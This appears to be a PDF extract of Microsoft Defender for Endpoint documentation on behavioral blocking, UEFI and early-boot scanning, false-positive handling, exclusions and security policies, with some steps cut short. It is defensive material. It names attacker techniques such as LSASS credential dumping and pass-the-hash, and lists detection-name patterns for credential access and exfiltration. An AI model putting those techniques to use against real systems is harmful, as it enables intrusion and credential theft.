contained. EDR in block mode works even if Microsoft Defender Antivirus isn't the
primary antivirus solution. (EDR in block mode isn't enabled by default; you turn it
on at Microsoft Defender XDR.)
Expect more to come in the area of behavioral blocking and containment, as Microsoft
continues to improve threat protection features and capabilities. To see what's planned
and rolling out now, visit the Microsoft 365 roadmap .
Examples of behavioral blocking and

containment in action
Behavioral blocking and containment capabilities have blocked attacker techniques such
as the following:
Credential dumping from LSASS

Cross-process injection
Process hollowing
User Account Control bypass
Tampering with antivirus (such as disabling it or adding the malware as exclusion)
Contacting Command and Control (C&C) to download payloads
Coin mining
Boot record modification
Pass-the-hash attacks
Installation of root certificate
Exploitation attempt for various vulnerabilities
Below are two real-life examples of behavioral blocking and containment in action.
Example 1: Credential theft attack against 100

organizations
As described in In hot pursuit of elusive threats: AI-driven behavior-based blocking
stops attacks in their tracks , a credential theft attack against 100 organizations around
the world was stopped by behavioral blocking and containment capabilities. Spear-
phishing email messages that contained a lure document were sent to the targeted
organizations. If a recipient opened the attachment, a related remote document was
able to execute code on the user's device and load Lokibot malware, which stole
credentials, exfiltrated stolen data, and waited for further instructions from a command-
and-control server.
Behavior-based device-learning models in Defender for Endpoint caught and stopped

the attacker's techniques at two points in the attack chain:
The first protection layer detected the exploit behavior. Device-learning classifiers
in the cloud correctly identified the threat as and immediately instructed the client
device to block the attack.
The second protection layer, which helped stop cases where the attack got past
the first layer, detected process hollowing, stopped that process, and removed the
corresponding files (such as Lokibot).
While the attack was detected and stopped, alerts, such as an "initial access alert," were
triggered and appeared in the Microsoft Defender portal.

This example shows how behavior-based device-learning models in the cloud add new
layers of protection against attacks, even after they have started running.
Example 2: NTLM relay - Juicy Potato malware variant

As described in the recent blog post, Behavioral blocking and containment:
Transforming optics into protection , in January 2020, Defender for Endpoint detected
a privilege escalation activity on a device in an organization. An alert called "Possible
privilege escalation using NTLM relay" was triggered.

The threat turned out to be malware; it was a new, not-seen-before variant of a

notorious hacking tool called Juicy Potato, which is used by attackers to get privilege
escalation on a device.
Minutes after the alert was triggered, the file was analyzed, and confirmed to be
malicious. Its process was stopped and blocked, as shown in the following image:
A few minutes after the artifact was blocked, multiple instances of the same file were
blocked on the same device, preventing more attackers or other malware from
deploying on the device.
This example shows that with behavioral blocking and containment capabilities, threats
are detected, contained, and blocked automatically.
 Tip

Next steps
Learn more about Defender for Endpoint
Configure your attack surface reduction rules
See recent global threat activity
Get an overview of Microsoft Defender XDR
 Tip
Feedback

Client behavioral blocking
Article • 07/18/2023
Applies to:

Platform
Windows
Overview
Client behavioral blocking is a component of behavioral blocking and containment
capabilities in Defender for Endpoint. As suspicious behaviors are detected on devices
(also referred to as clients or endpoints), artifacts (such as files or applications) are
blocked, checked, and remediated automatically.
Antivirus protection works best when paired with cloud protection.

How client behavioral blocking works
Microsoft Defender Antivirus can detect suspicious behavior, malicious code, fileless and
in-memory attacks, and more on a device. When suspicious behaviors are detected,
Microsoft Defender Antivirus monitors and sends those suspicious behaviors and their
process trees to the cloud protection service. Machine learning differentiates between
malicious applications and good behaviors within milliseconds, and classifies each
artifact. In almost real time, as soon as an artifact is found to be malicious, it's blocked
on the device.
Whenever a suspicious behavior is detected, an alert is generated and is visible while the
attack was detected and stopped; alerts, such as an "initial access alert," are triggered
and appear in the Microsoft Defender portal (formerly Microsoft Defender XDR).
Client behavioral blocking is effective because it not only helps prevent an attack from
starting, it can help stop an attack that has begun executing. And, with feedback-loop
blocking (another capability of behavioral blocking and containment), attacks are
prevented on other devices in your organization.
Behavior-based detections
Behavior-based detections are named according to the MITRE ATT&CK Matrix for
Enterprise . The naming convention helps identify the attack stage where the malicious
behavior was observed:
ﾉ Expand table
Tactic Detection threat name
Initial Access Behavior:Win32/InitialAccess.*!ml
Execution Behavior:Win32/Execution.*!ml
Persistence Behavior:Win32/Persistence.*!ml
Privilege Escalation Behavior:Win32/PrivilegeEscalation.*!ml
Defense Evasion Behavior:Win32/DefenseEvasion.*!ml
Credential Access Behavior:Win32/CredentialAccess.*!ml
Discovery Behavior:Win32/Discovery.*!ml
Lateral Movement Behavior:Win32/LateralMovement.*!ml

Tactic Detection threat name
Collection Behavior:Win32/Collection.*!ml
Command and Control Behavior:Win32/CommandAndControl.*!ml
Exfiltration Behavior:Win32/Exfiltration.*!ml
Impact Behavior:Win32/Impact.*!ml
Uncategorized Behavior:Win32/Generic.*!ml
 Tip
To learn more about specific threats, see recent global threat activity .
Configuring client behavioral blocking

If your organization is using Defender for Endpoint, client behavioral blocking is enabled
by default. However, to benefit from all Defender for Endpoint capabilities, including
behavioral blocking and containment, make sure the following features and capabilities
of Defender for Endpoint are enabled and configured:
Defender for Endpoint baselines

Devices onboarded to Defender for Endpoint
EDR in block mode
Next-generation protection (antivirus, antimalware, and other threat protection
capabilities)
 Tip

 Tip
Feedback

Feedback-loop blocking
Article • 07/18/2023
Applies to:

Platforms
Windows
Overview
Feedback-loop blocking, also referred to as rapid protection, is a component of
behavioral blocking and containment capabilities in Microsoft Defender for Endpoint.
With feedback-loop blocking, devices across your organization are better protected
from attacks.
How feedback-loop blocking works

When a suspicious behavior or file is detected, such as by Microsoft Defender Antivirus,
information about that artifact is sent to multiple classifiers. The rapid protection loop
engine inspects and correlates the information with other signals to arrive at a decision
as to whether to block a file. Checking and classifying artifacts happens quickly. It results
in rapid blocking of confirmed malware, and drives protection across the entire
ecosystem.
With rapid protection in place, an attack can be stopped on a device, other devices in
the organization, and devices in other organizations, as an attack attempts to broaden
its foothold.
Configuring feedback-loop blocking

If your organization is using Defender for Endpoint, feedback-loop blocking is enabled
by default. However, rapid protection occurs through a combination of Defender for
Endpoint capabilities, machine learning protection features, and signal-sharing across
Microsoft security services. Make sure the following features and capabilities of
Defender for Endpoint are enabled and configured:
Microsoft Defender for Endpoint baselines
Devices onboarded to Microsoft Defender for Endpoint
EDR in block mode
Next-generation protection (antivirus)
 Tip

Related articles
(Blog) Behavioral blocking and containment: Transforming optics into protection
Helpful Microsoft Defender for Endpoint resources
 Tip
Feedback
UEFI scanning in Defender for Endpoint
Article • 12/11/2023
Beginning June 17 2020, Microsoft Defender for Endpoint extended its protection
capabilities to the firmware level with a new Unified Extensible Firmware Interface (UEFI)
scanner.
Hardware and firmware-level attacks have continued to rise in recent years, as modern
security solutions made persistence and detection evasion on the operating system
more difficult. Attackers compromise the boot flow to achieve low-level malware
behavior that's hard to detect, posing a significant risk to an organization's security
posture.
Windows Defender System Guard helps defend against firmware attacks by providing
guarantees for secure boot through hardware-backed security features like hypervisor-
level attestation and Secure Launch, also known as Dynamic Root of Trust (DRTM),
which are enabled by default in Secured-core PCs . The new UEFI scan engine in
Defender for Endpoint expands on these protections by making firmware scanning
broadly available.
The UEFI scanner is a new component of the built-in antivirus solution on Windows 10
and newer versions, and gives Defender for Endpoint the unique ability to scan inside of
the firmware filesystem and perform security assessment. It integrates insights from our
partner chipset manufacturers and further expands the comprehensive endpoint
protection provided by Defender for Endpoint.
Prerequisites
Microsoft Defender Antivirus as the primary antivirus product
７ Note
UEFI scanner does not work with Endpoint detection and response (EDR) in
block mode, since Microsoft Defender Antivirus would be operating in passive
mode.
Real-Time Protection should be ON
Behavior Monitoring should be ON
Supported version of Microsoft Defender Antivirus Platform Update (N-2)

Windows 10, Windows 11 and newer versions, Windows Server 2012 R2 and
Windows Server 2016 running the unified Defender for Endpoint client, Windows
Server 2019, Windows Server 2022 and newer versions
How did we build the UEFI scanner?

The Unified Extensible Firmware Interface (UEFI) is a replacement for legacy BIOS. If the
chipset is configured correctly (UEFI & chipset configuration itself) and secure boot is
enabled, the firmware is reasonably secure. To perform a hardware-based attack,
attackers exploit a vulnerable firmware or a misconfigured machine to deploy a
rootkit , which allows attackers to gain foothold on the machine.
As the figure shows, for devices that are configured correctly, the boot path from
power-on to OS initialization is reliable. If secure boot is disabled or if the motherboard
chipset is misconfigured, attackers can change the contents of UEFI drivers that are
unsigned or tampered with in the firmware. This could allow attackers to take over
control of devices and give them the capability to deprivilege the operating system
kernel or antivirus to reconfigure the security of the firmware.
The Serial Peripheral Interface (SPI) flash stores important information. Its structure
depends on OEM's design, and commonly includes processor microcode update, Intel
Management Engine (ME), and boot image, a UEFI executable. When a computer runs,
processors execute the firmware code from SPI flash for a while during UEFI's SEC phase.
Instead of memory, the flash is permanently mapped to x86 reset vector (physical
address 0xFFFF_FFF0). However, attackers can interfere with memory access to reset
vector by software. They do this by reprogramming the BIOS control register on
misconfigured devices, making it even harder for security software to determine exactly
what gets executed during boot.
Once an implant is deployed, it's hard to detect. To catch threats at this level, security
solutions at the OS level rely on information from the firmware, but the chain of trust is
weakened.
Technically, the firmware is not stored and is not accessible from main memory. As
opposed to other software, it is stored in SPI flash storage, so the new UEFI scanner
must follow the hardware protocol provided by hardware manufacturers. To be
compatible and be up to date with all platforms, it needs to take into consideration
protocol differences.
The UEFI scanner performs dynamic analysis on the firmware it gets from the hardware
flash storage. By obtaining the firmware, the scanner is able to parse the firmware,
enabling Defender for Endpoint to inspect firmware content at runtime.
How do you turn on UEFI scanner?

The new UEFI scanner is a component of Microsoft Defender Antivirus, thus, as long as
it's the primary AV, it includes this capability to scan and access UEFI firmware.
How do you manage UEFI scanner?

It's a built-in functionality of Microsoft Defender Antivirus, thus, there is no additional
management.
How does the UEFI scanner in Defender for

Endpoint work?
The new UEFI scanner reads the firmware file system at runtime by interacting with the
motherboard chipset. To detect threats, it performs dynamic analysis using multiple new
solution components that include:
UEFI anti-rootkit, which reaches the firmware through Serial Peripheral Interface
(SPI)
Full filesystem scanner, which analyzes content inside the firmware
Detection engine, which identifies exploits and malicious behaviors
Firmware scanning is orchestrated by runtime events like suspicious driver load and
through periodic system scans. Detections are reported in Windows Security, under
Protection history.
Defender for Endpoint customers will also see these detections raised as alerts in
Microsoft Defender Security Center , empowering security operations teams to
investigate and respond to firmware attacks and suspicious activities at the firmware
level in their environments.
Security operations teams can also use the advanced hunting capabilities in Defender
for Endpoint to hunt for these threats:
PowerShell
DeviceEvents
| where ActionType == "AntivirusDetection"
| extend ThreatName=tostring(ParsedFields.ThreatName)
| where ThreatName contains_cs "UEFI"
| project ThreatName=tostring(ParsedFields.ThreatName),
FileName, SHA1, DeviceName, Timestamp
| limit 100
To detect unknown threats in SPI flash, signals from the UEFI scanner are analyzed to
identify anomalies and where they have been executed. Anomalies are reported to the
Microsoft Defender Security Center for investigation.
These events can likewise be queried through Advanced Hunting as shown:
PowerShell
DeviceAlertEvents
| where Title has "UEFI"
| summarize Titles=makeset(Title) by DeviceName, DeviceId, bin(Timestamp,

1d)
| limit 100
Comprehensive security levels up with low-

level protections
The new UEFI scanner adds to a rich set of Microsoft technologies that integrate to
deliver chip-to-cloud security, from a strong hardware root of trust to cloud-powered
security solutions at the OS level.
Hardware backed security features like Secure Launch and device attestation help stop
firmware attacks. These features, which are enabled by default in Secured-core PCs ,
seamlessly integrate with Defender for Endpoint to provide comprehensive endpoint
protection.
With its UEFI scanner, Defender for Endpoint gets even richer visibility into threats at
the firmware level, where attackers have been increasingly focusing their efforts on.
Security operations teams can use this new level of visibility, along with the rich set of
detection and response capabilities in Defender for Endpoint, to investigate and contain
such advanced attacks.
This level of visibility is also available in Microsoft 365 Defender (M365D) , which
delivers an even broader cross-domain defense that coordinates protection across
endpoints, identities, email, and apps.
Feedback

Early Launch Antimalware (ELAM) and
Article • 02/27/2024
Applies to:

Microsoft Defender for Individual
Platforms:
Windows 11, Windows 10, Windows 8.1, Windows 8

Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows
Server 2012
Detecting malware that starts early in the boot cycle was a challenge before Windows 8.
To combat early boot threats such as rootkits or malicious drivers that can hide from
detection, as of August 1, 2012, Microsoft Defender Antivirus (MDAV) for Windows 8
and newer, or Windows Server 2012 and newer, incorporated a new feature called Early
Launch Antimalware (ELAM) driver. Microsoft Defender Antivirus uses Wdboot.sys driver
that starts before other boot-start drivers, enables the evaluation of those drivers, and
helps the Windows kernel decide whether they should be initialized.
Where is the ELAM detection(s) logged?

The ELAM detection is logged in the same location as the other Microsoft Defender
Antivirus threats, such as Event ID 1006.
How do I keep the MDAV ELAM driver up to date?

The MDAV ELAM driver ships with the monthly “Platform update.”
Can the Early Launch Antimalware (ELAM) policy be

modified?
ELAM can be modified here: Computer Configuration > Administrative Templates >
System > Early Launch Antimalware.
How can I check that the MDAV ELAM driver is loaded?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\EarlyLaunch BackupPath
(string) C:\Windows\ELAMBKUP\WdBoot.sys (value)
How do I revert the MDAV ELAM driver to a previous

version?
C:\ProgramData\Microsoft\Windows Defender\Platform<antimalware platform
version>\MpCmdRun.exe -RevertPlatform
For example: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24010.12-
0\MpCmdRun.exe -RevertPlatform
Feedback

Address false positives/negatives in
Article • 07/18/2023
Applies to:

Platforms
Windows
In endpoint protection solutions, a false positive is an entity, such as a file or a process

that was detected and identified as malicious even though the entity isn't actually a
threat. A false negative is an entity that wasn't detected as a threat, even though it
actually is malicious. False positives/negatives can occur with any threat protection
solution, including Defender for Endpoint.
Fortunately, steps can be taken to address and reduce these kinds of issues. If you're
seeing false positives/negatives occurring with Defender for Endpoint, your security
operations can take steps to address them by using the following process:
1. Review and classify alerts

2. Review remediation actions that were taken
3. Review and define exclusions
4. Submit an entity for analysis
5. Review and adjust your threat protection settings
You can get help if you still have issues with false positives/negatives after performing
the tasks described in this article. See Still need help?
７ Note
This article is intended as guidance for security operators and security

administrators who are using Defender for Endpoint.
Part 1: Review and classify alerts

If you see an alert that arose because something's detected as malicious or suspicious
and it shouldn't be, you can suppress the alert for that entity. You can also suppress
alerts that aren't necessarily false positives, but are unimportant. We recommend that
you also classify alerts.
Managing your alerts and classifying true/false positives helps to train your threat
protection solution and can reduce the number of false positives or false negatives over
time. Taking these steps also helps reduce noise in your queue so that your security
team can focus on higher priority work items.
Determine whether an alert is accurate

Before you classify or suppress an alert, determine whether the alert is accurate, a false
positive, or benign.
1. In the Microsoft Defender portal , in the navigation pane, choose Incidents &
alerts and then select Alerts.
2. Select an alert to view more details about it. (To get help with this task, see Review
alerts in Defender for Endpoint.)
3. Depending on the alert status, take the steps described in the following table:
ﾉ Expand table
Alert status What to do
The alert is accurate Assign the alert, and then investigate it further.
The alert is a false positive 1. Classify the alert as a false positive.
2. Suppress the alert.
3. Create an indicator for Microsoft Defender for

Endpoint.
4. Submit a file to Microsoft for analysis.
The alert is accurate, but benign Classify the alert as a true positive, and then
(unimportant) suppress the alert.
Classify an alert
Alerts can be classified as false positives or true positives in the Microsoft Defender
portal. Classifying alerts helps train Defender for Endpoint so that over time, you'll see
more true alerts and fewer false alerts.
alerts, select Alerts and then select an alert.
2. For the selected alert, select Manage alert. A flyout pane opens.
3. In the Manage alert section, in the Classification field, classify the alert (True
positive, Informational, expected activity, or False positive).
 Tip
For more information about suppressing alerts, see Manage Defender for
Endpoint alerts. And, if your organization is using a security information and event
management (SIEM) server, make sure to define a suppression rule there, too.
Suppress an alert
If you have alerts that are either false positives or that are true positives but for
unimportant events, you can suppress those alerts in Microsoft Defender XDR.
Suppressing alerts helps reduce noise in your queue.
alerts and then select Alerts.
2. Select an alert that you want to suppress to open its Details pane.
3. In the Details pane, choose the ellipsis (...), and then Create suppression rule.
4. Specify all the settings for your suppression rule, and then choose Save.
 Tip
Need help with suppression rules? See Suppress an alert and create a new
suppression rule.
Part 2: Review remediation actions

Remediation actions, such as sending a file to quarantine or stopping a process, are
taken on entities (such as files) that are detected as threats. Several types of remediation
actions occur automatically through automated investigation and Microsoft Defender
Antivirus:
Quarantine a file
Remove a registry key
Kill a process
Stop a service
Disable a driver
Remove a scheduled task
Other actions, such as starting an antivirus scan or collecting an investigation package,

occur manually or through Live Response. Actions taken through Live Response can't be
undone.
After you've reviewed your alerts, your next step is to review remediation actions. If any
actions were taken as a result of false positives, you can undo most kinds of remediation
actions. Specifically, you can:
Restore a quarantined file from the Action Center

Undo multiple actions at one time
Remove a file from quarantine across multiple devices. and
Restore file from quarantine
When you're done reviewing and undoing actions that were taken as a result of false
positives, proceed to review or define exclusions.
Review completed actions
1. In the Microsoft Defender portal , select Actions & submissions and then select
Action center.
2. Select the History tab to view a list of actions that were taken.
3. Select an item to view more details about the remediation action that was taken.
Restore a quarantined file from the Action Center

Action center.
2. On the History tab, select an action that you want to undo.
3. In the flyout pane, select Undo. If the action can't be undone with this method, you
won't see an Undo button. (To learn more, see Undo completed actions.)
Undo multiple actions at one time

Action center.
2. On the History tab, select the actions that you want to undo.
3. In the flyout pane on the right side of the screen, select Undo.
Remove a file from quarantine across multiple devices


Action center.
2. On the History tab, select a file that has the Action type Quarantine file.
3. In the pane on the right side of the screen, select Apply to X more instances of
this file, and then select Undo.
Review quarantined messages

1. In the Microsoft Defender portal , in the navigation pane, under Email &
collaboration, select Exchange message trace.
2. Select a message to view details.

You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.
1. Open Command Prompt as an administrator on the device:

2. Type the following command, and press Enter:

Console
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name

EUS:Win32/CustomEnterpriseBlock -All
） Important
In some scenarios, the ThreatName may appear as

EUS:Win32/CustomEnterpriseBlock!cl . Defender for Endpoint will restore all
custom blocked files that were quarantined on this device in the last 30 days.
A file that was quarantined as a potential network threat might not be
recoverable. If a user attempts to restore the file after quarantine, that file
might not be accessible. This can be due to the system no longer having
network credentials to access the file. Typically, this is a result of a temporary
log on to a system or shared folder and the access tokens expired.
3. In the pane on the right side of the screen, select Apply to X more instances of
this file, and then select Undo.
Part 3: Review or define exclusions
Ｕ Caution
Before you define an exclusion, review the detailed information in Manage

exclusions for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus. Keep in mind that every exclusion that is defined lowers your level of
protection.
An exclusion is an entity, such as a file or URL, that you specify as an exception to

remediation actions. The excluded entity can still get detected, but no remediation
actions are taken on that entity. That is, the detected file or process won't be stopped,
sent to quarantine, removed, or otherwise changed by Microsoft Defender for Endpoint.
To define exclusions across Microsoft Defender for Endpoint, perform the following
tasks:
Define exclusions for Microsoft Defender Antivirus

Create "allow" indicators for Microsoft Defender for Endpoint
７ Note
Microsoft Defender Antivirus exclusions apply only to antivirus protection, not
across other Microsoft Defender for Endpoint capabilities. To exclude files broadly,
use exclusions for Microsoft Defender Antivirus and custom indicators for
The procedures in this section describe how to define exclusions and indicators.
Exclusions for Microsoft Defender Antivirus

In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus.
Make sure that you define exclusions sparingly, and that you only include the files,
folders, processes, and process-opened files that are resulting in false positives. In
addition, make sure to review your defined exclusions regularly. We recommend using
Microsoft Intune to define or edit your antivirus exclusions; however, you can use other
methods, such as Group Policy (see Manage Microsoft Defender for Endpoint.
 Tip
Need help with antivirus exclusions? See Configure and validate exclusions for
Use Intune to manage antivirus exclusions (for existing policies)
1. In the Microsoft Intune admin center , choose Endpoint security > Antivirus, and
then select an existing policy. (If you don't have an existing policy, or you want to
create a new policy, skip to Use Intune to create a new antivirus policy with
exclusions.)
2. Choose Properties, and next to Configuration settings, choose Edit.
3. Expand Microsoft Defender Antivirus Exclusions and then specify your exclusions.
without the file path or folder. Separate each file type in the list must be
separated with a | character. For example, lib|obj . For more information,
see ExcludedExtensions.
Use Intune to create a new antivirus policy with exclusions

1. In the Microsoft Intune admin center , choose Endpoint security > Antivirus > +
Create Policy.
2. Select a platform (such as Windows 10, Windows 11, and Windows Server).
3. For Profile, select Microsoft Defender Antivirus exclusions, and then choose
Create.
4. On the Create profile step, specify a name and description for the profile, and then
choose Next.
5. On the Configuration settings tab, specify your antivirus exclusions, and then
choose Next.
without the file path or folder. Separate each file type in the list with a |
character. For example, lib|obj . For more information, see
ExcludedExtensions.
6. On the Scope tags tab, if you're using scope tags in your organization, specify
scope tags for the policy you're creating. (See Scope tags.)
be applied, and then choose Next. (If you need help with assignments, see Assign
Indicators for Defender for Endpoint

Indicators (specifically, indicators of compromise, or IoCs) enable your security
operations team to define the detection, prevention, and exclusion of entities. For
example, you can specify certain files to be omitted from scans and remediation actions
in Microsoft Defender for Endpoint. Or, indicators can be used to generate alerts for
certain files, IP addresses, or URLs.
To specify entities as exclusions for Defender for Endpoint, create "allow" indicators for
those entities. Such "allow" indicators apply to next-generation protection and
automated investigation & remediation.
"Allow" indicators can be created for:
Files
IP addresses, URLs, and domains
Application certificates
Indicators for files
When you create an "allow" indicator for a file, such as an executable, it helps prevent
files that your organization is using from being blocked. Files can include portable
executable (PE) files, such as .exe and .dll files.
Before you create indicators for files, make sure the following requirements are met:
Microsoft Defender Antivirus is configured with cloud-based protection enabled
(see Manage cloud-based protection)
Antimalware client version is 4.18.1901.x or later
Devices are running Windows 10, version 1703 or later, or Windows 11; Windows
Server 2012 R2 and Windows Server 2016 with the modern unified solution in
Defender for Endpoint, or Windows Server 2019, or Windows Server 2022
The Block or allow feature is turned on
Indicators for IP addresses, URLs, or domains
When you create an "allow" indicator for an IP address, URL, or domain, it helps prevent
the sites or IP addresses your organization uses from being blocked.
Before you create indicators for IP addresses, URLs, or domains, make sure the following
requirements are met:
Network protection in Defender for Endpoint is enabled in block mode (see Enable
network protection)
Devices are running Windows 10, version 1709, or later, or Windows 11
Custom network indicators are turned on in the Microsoft Defender XDR. To learn more,
see Advanced features.
Indicators for application certificates

When you create an "allow" indicator for an application certificate, it helps prevent
applications, such as internally developed applications, that your organization uses from
being blocked. .CER or .PEM file extensions are supported.
Before you create indicators for application certificates, make sure the following
requirements are met:
Microsoft Defender Antivirus is configured with cloud-based protection enabled

(see Manage cloud-based protection
Devices are running Windows 10, version 1703 or later, or Windows 11; Windows
Server 2012 R2 and Windows Server 2016 with the modern unified solution in
Defender for Endpoint, or Windows Server 2019, or Windows Server 2022
Virus and threat protection definitions are up to date
 Tip
When you create indicators, you can define them one by one, or import multiple
items at once. Keep in mind there's a limit of 15,000 indicators for a single tenant.
And, you might need to gather certain details first, such as file hash information.
Make sure to review the prerequisites before you create indicators.
Part 4: Submit a file for analysis

You can submit entities, such as files and fileless detections, to Microsoft for analysis.
Microsoft security researchers analyze all submissions, and their results help inform
Defender for Endpoint threat protection capabilities. When you sign in at the submission
site, you can track your submissions.
Submit a file for analysis

If you have a file that was either wrongly detected as malicious or was missed, follow
these steps to submit the file for analysis.
1. Review the guidelines here: Submit files for analysis.
2. Submit files in Defender for Endpoint or visit the Microsoft Security Intelligence
submission site and submit your files.
Submit a fileless detection for analysis

If something was detected as malware based on behavior, and you don't have a file, you
can submit your Mpsupport.cab file for analysis. You can get the .cab file by using the
Microsoft Malware Protection Command-Line Utility (MPCmdRun.exe) tool on Windows
10 or Windows 11.
1. Go to C:\ProgramData\Microsoft\Windows Defender\Platform\<version> , and then

run MpCmdRun.exe as an administrator.
2. Type mpcmdrun.exe -GetFiles , and then press Enter.
A .cab file is generated that contains various diagnostic logs. The location of the
file is specified in the output of the command prompt. By default, the location is
C:\ProgramData\Microsoft\Microsoft Defender\Support\MpSupportFiles.cab .
3. Review the guidelines here: Submit files for analysis.
4. Visit the Microsoft Security Intelligence submission site

(https://www.microsoft.com/wdsi/filesubmission ), and submit your .cab files.
What happens after a file is submitted?
Your submission is immediately scanned by our systems to give you the latest
determination even before an analyst starts handling your case. It's possible that a file
might have already been submitted and processed by an analyst. In those cases, a
determination is made quickly.
For submissions that weren't already processed, they're prioritized for analysis as
follows:
Prevalent files with the potential to affect a large number of computers are given a
higher priority.
Authenticated customers, especially enterprise customers with valid Software
Assurance IDs (SAIDs) , are given a higher priority.
Submissions flagged as high priority by SAID holders are given immediate
attention.
To check for updates regarding your submission, sign in at the Microsoft Security
Intelligence submission site .
 Tip
To learn more, see Submit files for analysis.
Part 5: Review and adjust your threat

protection settings
Defender for Endpoint offers a wide variety of options, including the ability to fine-tune
settings for various features and capabilities. If you're getting numerous false positives,
make sure to review your organization's threat protection settings. You might need to
make some adjustments to:
Remediation for potentially unwanted applications
Check your cloud-delivered protection level for Microsoft Defender Antivirus. By default,
cloud-delivered protection is set to Not configured; however, we recommend turning it
on. To learn more about configuring your cloud-delivered protection, see Turn on cloud
You can use Intune or other methods, such as Group Policy, to edit or set your cloud-
delivered protection settings.
See Turn on cloud protection in Microsoft Defender Antivirus.
Remediation for potentially unwanted applications

Potentially unwanted applications (PUA) are a category of software that can cause
devices to run slowly, display unexpected ads, or install other software that might be
unexpected or unwanted. Examples of PUA include advertising software, bundling
software, and evasion software that behaves differently with security products. Although
PUA isn't considered malware, some kinds of software are PUA based on their behavior
and reputation.
To learn more about PUA, see Detect and block potentially unwanted applications.
Depending on the apps your organization is using, you might be getting false positives
as a result of your PUA protection settings. If necessary, consider running PUA
protection in audit mode for a while, or apply PUA protection to a subset of devices in
your organization. PUA protection can be configured for the Microsoft Edge browser
and for Microsoft Defender Antivirus.
We recommend using Intune to edit or set PUA protection settings; however, you can
use other methods, such as Group Policy.
See Configure PUA protection in Microsoft Defender Antivirus.

Automated investigation and remediation (AIR) capabilities are designed to examine
alerts and take immediate action to resolve breaches. As alerts are triggered, and an
automated investigation runs, a verdict is generated for each piece of evidence
investigated. Verdicts can be Malicious, Suspicious, or No threats found.
Depending on the level of automation set for your organization and other security
settings, remediation actions are taken on artifacts that are considered to be Malicious
or Suspicious. In some cases, remediation actions occur automatically; in other cases,
remediation actions are taken manually or only upon approval by your security
operations team.
Learn more about automation levels; and then
Configure AIR capabilities in Defender for Endpoint.
） Important
We recommend using Full automation for automated investigation and

remediation. Don't turn these capabilities off because of a false positive. Instead,
use "allow" indicators to define exceptions, and keep automated investigation and
remediation set to take appropriate actions automatically. Following this guidance
helps reduce the number of alerts your security operations team must handle.
Still need help?

If you've worked through all the steps in this article and still need help, contact technical
support.
1. In the Microsoft Defender portal , in the upper right corner, select the question
mark (?), and then select Microsoft support.
2. In the Support Assistant window, describe your issue, and then send your
message. From there, you can open a service request.
See also
Manage Defender for Endpoint
Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus
Overview of Microsoft Defender portal
 Tip
Feedback

Manage endpoint security policies in
Article • 12/14/2023
） Important

Applies to:

Use security policies to manage security settings on devices. As a security administrator,

you can configure security policy settings in Microsoft Defender XDR.
You'll find endpoint security policies under Endpoints > Configuration management >
Endpoint security policies.
７ Note
The Endpoint Security Policies page in Microsoft Defender XDR is available only for
users with the security administrator role in Microsoft Defender XDR. Any other
user role, such as Security Reader, cannot access the portal. When a user has the
required permissions to view policies in the Microsoft Defender portal, the data is
presented based on Intune permissions. If the user is in scope for Intune role-based
access control, it applies to the list of policies presented in the Microsoft Defender
portal. We recommend granting security administrators with the Intune built-in
role, "Endpoint Security Manager" to effectively align the level of permissions
between Intune and Microsoft Defender XDR.
The following list provides a brief description of each endpoint security policy type:
Antivirus - Antivirus policies help security admins focus on managing the discrete
group of antivirus settings for managed devices.
Disk encryption - Endpoint security disk encryption profiles focus on only the
settings that are relevant for a devices built-in encryption method, like FileVault or
BitLocker. This focus makes it easy for security admins to manage disk encryption
settings without having to navigate a host of unrelated settings.
Firewall - Use the endpoint security Firewall policy in Intune to configure a devices
built-in firewall for devices that run macOS and Windows 10/11.
Endpoint detection and response - When you integrate Microsoft Defender for
Endpoint with Intune, use the endpoint security policies for endpoint detection and
response (EDR) to manage the EDR settings and onboard devices to Microsoft
Attack surface reduction - When Microsoft Defender Antivirus is in use on your

Windows 10/11 devices, use Intune endpoint security policies for attack surface
reduction to manage those settings for your devices.
Create an endpoint security policy
７ Note
Currently, only antivirus policies are supported.
1. Sign in to Microsoft Defender XDR using at least a security admin role.
2. Select Endpoints > Configuration management > Endpoint security policies and
then select Create new Policy.
3. Select a platform from the dropdown list.
4. Select a template, then select Create policy.
5. On the Basics page, enter a name and description for the profile, then choose
Next.
6. On the Settings page, expand each group of settings, and configure the settings
you want to manage with this profile.
When you're done configuring settings, select Next.
7. On the Assignments page, select the groups that will receive this profile.
Select Next.
8. On the Review + create page, when you're done, select Save. The new profile is
displayed in the list when you select the policy type for the profile you created.
７ Note
To edit the scope tags, you'll need to go to the Microsoft Intune admin center .
To edit an endpoint security policy

1. Select the new policy, and then select Edit.
2. Select Settings to expand a list of the configuration settings in the policy. You can't
modify the settings from this view, but you can review how they're configured.
3. To modify the policy, select Edit for each category where you want to make a
change:
Basics
Settings
Assignments
4. After you've made changes, select Save to save your edits. Edits to one category
must be saved before you can introduce edits to additional categories.
Verify endpoint security policies

To verify that you have successfully created a policy, select a policy name from the list of
endpoint security policies.
７ Note
It can take up to 90 minutes for a policy to reach a device. To expedite the process,
for devices Managed by Defender for Enpoint, you can select Policy sync from the
actions menu so that it is applied in approximately 10 minutes.
The policy page displays details that summarize the status of the policy. You can view a
policy's status, which devices it has been applied to, and assigned groups.
During an investigation, you can also view the Security policies tab in the device page
to view the list of policies that are being applied to a particular device. For more
information, see Investigating devices.
 Tip
Feedback

Increase compliance to the Microsoft
Defender for Endpoint security baseline
Article • 02/07/2023
Applies to:

Security baselines ensure that security features are configured according to guidance
from both security experts and expert Windows system administrators. When deployed,
the Defender for Endpoint security baseline sets Defender for Endpoint security controls
to provide optimal protection.
To understand security baselines and how they're assigned on Intune using

configuration profiles, read this FAQ.
Before you can deploy and track compliance to security baselines:
Enroll your devices to Intune management

Ensure you have the necessary permissions
Compare the Microsoft Defender for Endpoint

and the Windows Intune security baselines
The Windows Intune security baseline provides a comprehensive set of recommended
settings needed to securely configure devices running Windows, including browser
settings, PowerShell settings, and settings for some security features like Microsoft
Defender Antivirus. In contrast, the Defender for Endpoint baseline provides settings
that optimize all the security controls in the Defender for Endpoint stack, including
settings for endpoint detection and response (EDR) and settings also found in the
Windows Intune security baseline. For more information about each baseline, see:
